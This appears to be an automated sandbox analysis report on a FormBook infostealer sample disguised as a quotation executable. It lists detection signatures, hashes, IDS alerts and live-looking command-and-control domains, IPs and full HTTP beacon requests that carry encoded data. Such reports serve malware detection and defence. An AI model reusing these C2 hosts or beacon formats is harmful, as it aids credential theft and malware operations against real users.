Windows Analysis Report
PTT Group project - Quotation.exe

Overview

General Information

Sample name: PTT Group project - Quotation.exe
Analysis ID: 1467924
MD5: 0ffee94b9fb3a74d3f1ad3774edc51ed
SHA1: 0fe3355e5e7a1543c42a1c66fd9285b2b0529af0
SHA256: c413b461e4df7628f4ccdaa98233ec18a3d6808265dc38f631902ef58f502c88
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: http://www.binpvae.lol/kfqo/?9TND4h=NiOdQOuMLD2zHgMWwKws4JzuutDmLpx3tWxYTf2s7ZGupi3Uz5m5Dts89dE7D44P7JMDqAvEJ+8u+Llyo4b9pPx+fjdmUm+qFImntH+EZRPwIZM2dcS4AHM=&MXOD=nDFLlbM87h Avira URL Cloud: Label: malware
Source: http://www.binpvae.lol/kfqo/ Avira URL Cloud: Label: malware
Source: http://www.778981.com/p1dd/?MXOD=nDFLlbM87h&9TND4h=G7DDmCfNGXy3uJCEgcIIU1iXFvarFYWbvsRS9sxoYaNScQyM2A1goKEbo8KV9mX8trrejs5AH6YGa7AwDEXag2zD7gw0a+PZJfygUURv+5LCwJWR5NAeUOI= Avira URL Cloud: Label: malware
Source: www.hsck520.com Virustotal: Detection: 5% Perma Link
Source: www.778981.com Virustotal: Detection: 10% Perma Link
Source: http://www.binpvae.lol/kfqo/ Virustotal: Detection: 6% Perma Link
Source: http://www.hsck520.com/2e2r/ Virustotal: Detection: 8% Perma Link
Source: http://www.hsck520.com Virustotal: Detection: 5% Perma Link
Source: PTT Group project - Quotation.exe ReversingLabs: Detection: 36%
Source: PTT Group project - Quotation.exe Virustotal: Detection: 34% Perma Link
Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.4088478825.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4087484758.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1762561300.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4088367341.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1762331518.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4090192746.0000000005020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4088706556.00000000024B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1764648995.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: PTT Group project - Quotation.exe Joe Sandbox ML: detected
Source: PTT Group project - Quotation.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KWyVcOvVIsFTpZOKF.exe, 00000002.00000000.1682080075.000000000069E000.00000002.00000001.01000000.00000004.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000000.1834850249.000000000069E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: rmactivate_ssp.pdb source: svchost.exe, 00000001.00000003.1730334364.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731134326.0000000003701000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088107125.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4092075647.0000000005080000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: PTT Group project - Quotation.exe, 00000000.00000003.1647870847.0000000003680000.00000004.00001000.00020000.00000000.sdmp, PTT Group project - Quotation.exe, 00000000.00000003.1648740790.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1652445015.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1654212029.0000000003600000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.0000000003340000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1762307903.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1772192727.000000000318C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PTT Group project - Quotation.exe, 00000000.00000003.1647870847.0000000003680000.00000004.00001000.00020000.00000000.sdmp, PTT Group project - Quotation.exe, 00000000.00000003.1648740790.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1763015202.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763015202.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1652445015.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1654212029.0000000003600000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, RMActivate_ssp.exe, 00000003.00000002.4088663441.0000000003340000.00000040.00001000.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1762307903.0000000002FD0000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.1772192727.000000000318C000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4088663441.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4089116810.000000000396C000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.00000000122AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: RMActivate_ssp.exe, 00000003.00000002.4087642790.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.4089116810.000000000396C000.00000004.10000000.00040000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000005.00000002.4088627058.0000000002BEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2051321397.00000000122AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: rmactivate_ssp.pdbGCTL source: svchost.exe, 00000001.00000003.1730334364.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731134326.0000000003701000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4088107125.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, KWyVcOvVIsFTpZOKF.exe, 00000002.00000002.4092075647.0000000005080000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00974696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00974696
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0097C9C7
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097C93C FindFirstFileW,FindClose, 0_2_0097C93C
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0097F200
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0097F35D
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0097F65E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00973A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00973A2B
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_00973D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00973D4E
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_0097BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0097BF27
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 3_2_029BBBE0 FindFirstFileW,FindNextFileW,FindClose, 3_2_029BBBE0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 4x nop then xor eax, eax 3_2_029A9730
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Code function: 4x nop then mov ebx, 00000004h 3_2_031B0544

Networking

barindex
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52649 -> 165.154.0.120:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52650 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52651 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52653 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52655 -> 147.92.36.231:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52656 -> 147.92.36.231:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52658 -> 147.92.36.231:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52659 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52660 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52662 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52663 -> 203.161.55.102:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52664 -> 203.161.55.102:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52666 -> 203.161.55.102:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52667 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52668 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52670 -> 116.213.43.190:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52671 -> 13.248.169.48:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52672 -> 13.248.169.48:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52674 -> 13.248.169.48:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52675 -> 38.47.232.224:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52676 -> 38.47.232.224:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52678 -> 38.47.232.224:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52679 -> 35.190.52.58:80
Source: Traffic Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:52680 -> 35.190.52.58:80
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:52682 -> 35.190.52.58:80
Source: Joe Sandbox View IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View IP Address: 203.161.55.102 203.161.55.102
Source: Joe Sandbox View IP Address: 165.154.0.120 165.154.0.120
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View ASN Name: INTERHOPCA INTERHOPCA
Source: Joe Sandbox View ASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK DNC-ASDimensionNetworkCommunicationLimitedHK
Source: Joe Sandbox View ASN Name: COGENT-174US COGENT-174US
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\PTT Group project - Quotation.exe Code function: 0_2_009825E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_009825E2
Source: global traffic HTTP traffic detected: GET /p1dd/?MXOD=nDFLlbM87h&9TND4h=G7DDmCfNGXy3uJCEgcIIU1iXFvarFYWbvsRS9sxoYaNScQyM2A1goKEbo8KV9mX8trrejs5AH6YGa7AwDEXag2zD7gw0a+PZJfygUURv+5LCwJWR5NAeUOI= HTTP/1.1Host: www.778981.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /kfqo/?9TND4h=NiOdQOuMLD2zHgMWwKws4JzuutDmLpx3tWxYTf2s7ZGupi3Uz5m5Dts89dE7D44P7JMDqAvEJ+8u+Llyo4b9pPx+fjdmUm+qFImntH+EZRPwIZM2dcS4AHM=&MXOD=nDFLlbM87h HTTP/1.1Host: www.binpvae.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /1kbe/?MXOD=nDFLlbM87h&9TND4h=tZQfW8UiiNJTf5Fq5WrX9vmmZrioxCoVqMwq5i80b8QJkwpSgFAdETlO4QFSoDRfTxjpMxprnPemrx/P1Sfw5KD2hu+ipHyltaJOhZhwSC5dlgXXfIxM6PM= HTTP/1.1Host: www.a9jcpf.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /il19/?9TND4h=2W0Inf+zka60rkge6x3gGQQeo1iuz6hi+bPXuzv4I1vHSGtqZzoorLZZnoCmwyX2i4rMR0gWWwZYBzao7rAttPu5367SyozTICrQ88OWOZt9joXCP1iWm4I=&MXOD=nDFLlbM87h HTTP/1.1Host: www.mhtnvro.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /ff8d/?MXOD=nDFLlbM87h&9TND4h=ohJD03igrpR8lwlwc1M4EqZrzingiHicFb+y4T5GGfrPyp+0FgUaOIwicDYxE9IqyQjr9lfiRuNbkNF7eyT6Zergy2OfkJkLywWhdn0W3d/t29Aith2p64g= HTTP/1.1Host: www.lexiecos.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /l8a4/?9TND4h=CPL7YN3vcnDyuUFtA6pv3uMhLFbLrJb1JE9LZisFmiEQ0vYrwOGtj9QBvlTfLzXcbjIACE/TYt0vO88JJ7+OI7LCsTQn12dDmlA0tsWVEcE74AqN9n1fFjE=&MXOD=nDFLlbM87h HTTP/1.1Host: www.augaqfp.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /cns4/?MXOD=nDFLlbM87h&9TND4h=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs= HTTP/1.1Host: www.webuyfontana.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /rmef/?9TND4h=UdI5Nug9LeCq3QKyZxAFTuhDHYNaCA3T0/tR5L8b4jWaA2fUCVH3fLw1ebDEBIsiTWaLxfrgjTz4bD/84RJrNmZZ6yqPN++//ptV/K/4BOxQ2TPEoKO+wL0=&MXOD=nDFLlbM87h HTTP/1.1Host: www.ytw6.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic HTTP traffic detected: GET /2e2r/?9TND4h=0euIbLTFP3+EyEtzvor9i8vHBXpYgQpCpm4T5C+2kVz8Gw9LnD+VjddQp9QTALZxA8pe/VRvpSGAU2oGCWkdjrfpA+HWsjyp03alRT8mG3hS2I+8+ag3/fo=&MXOD=nDFLlbM87h HTTP/1.1Host: www.hsck520.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Source: global traffic DNS traffic detected: DNS query: www.778981.com
Source: global traffic DNS traffic detected: DNS query: www.binpvae.lol
Source: global traffic DNS traffic detected: DNS query: www.byteffederal.com
Source: global traffic DNS traffic detected: DNS query: www.jjkelker.com
Source: global traffic DNS traffic detected: DNS query: www.a9jcpf.top
Source: global traffic DNS traffic detected: DNS query: www.mhtnvro.lol
Source: global traffic DNS traffic detected: DNS query: www.lexiecos.top
Source: global traffic DNS traffic detected: DNS query: www.augaqfp.lol
Source: global traffic DNS traffic detected: DNS query: www.webuyfontana.com
Source: global traffic DNS traffic detected: DNS query: www.ytw6.top
Source: global traffic DNS traffic detected: DNS query: www.caroinapottery.com
Source: global traffic DNS traffic detected: DNS query: www.hsck520.com
Source: global traffic DNS traffic detected: DNS query: www.mebutnotme.store
Source: unknown HTTP traffic detected: POST /kfqo/ HTTP/1.1Host: www.binpvae.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.binpvae.lolReferer: http://www.binpvae.lol/kfqo/Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 203Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 39 54 4e 44 34 68 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4e 6e 70 74 34 4c 63 69 39 59 44 36 6f 74 7a 43 42 4c 67 71 74 32 70 78 59 36 58 41 35 71 79 75 6c 48 44 64 31 49 36 6e 44 4d 51 65 6d 34 70 57 4f 59 31 35 37 4c 59 70 78 30 50 54 51 63 73 48 6d 5a 34 4c 6a 4c 6a 43 2b 70 78 77 4d 77 42 77 52 55 32 6d 54 59 50 66 73 6e 69 45 4f 47 2f 47 4e 73 6f 62 63 38 2b 44 49 31 74 6b 55 69 58 32 70 78 54 56 61 4e 75 54 39 72 2b 58 35 4c 34 58 74 6f 74 6f 73 34 48 4a 4c 67 4a 46 67 45 47 6e 4c 57 5a 61 43 49 38 34 66 57 4e 51 56 55 6e 78 4a 6b 51 6f 41 41 35 4d 72 6a 41 6a 35 48 50 4f 57 49 31 68 4c 77 3d 3d Data Ascii: 9TND4h=Agm9T7DKMA28Nnpt4Lci9YD6otzCBLgqt2pxY6XA5qyulHDd1I6nDMQem4pWOY157LYpx0PTQcsHmZ4LjLjC+pxwMwBwRU2mTYPfsniEOG/GNsobc8+DI1tkUiX2pxTVaNuT9r+X5L4Xtotos4HJLgJFgEGnLWZaCI84fWNQVUnxJkQoAA5MrjAj5HPOWI1hLw==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 01:24:16 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
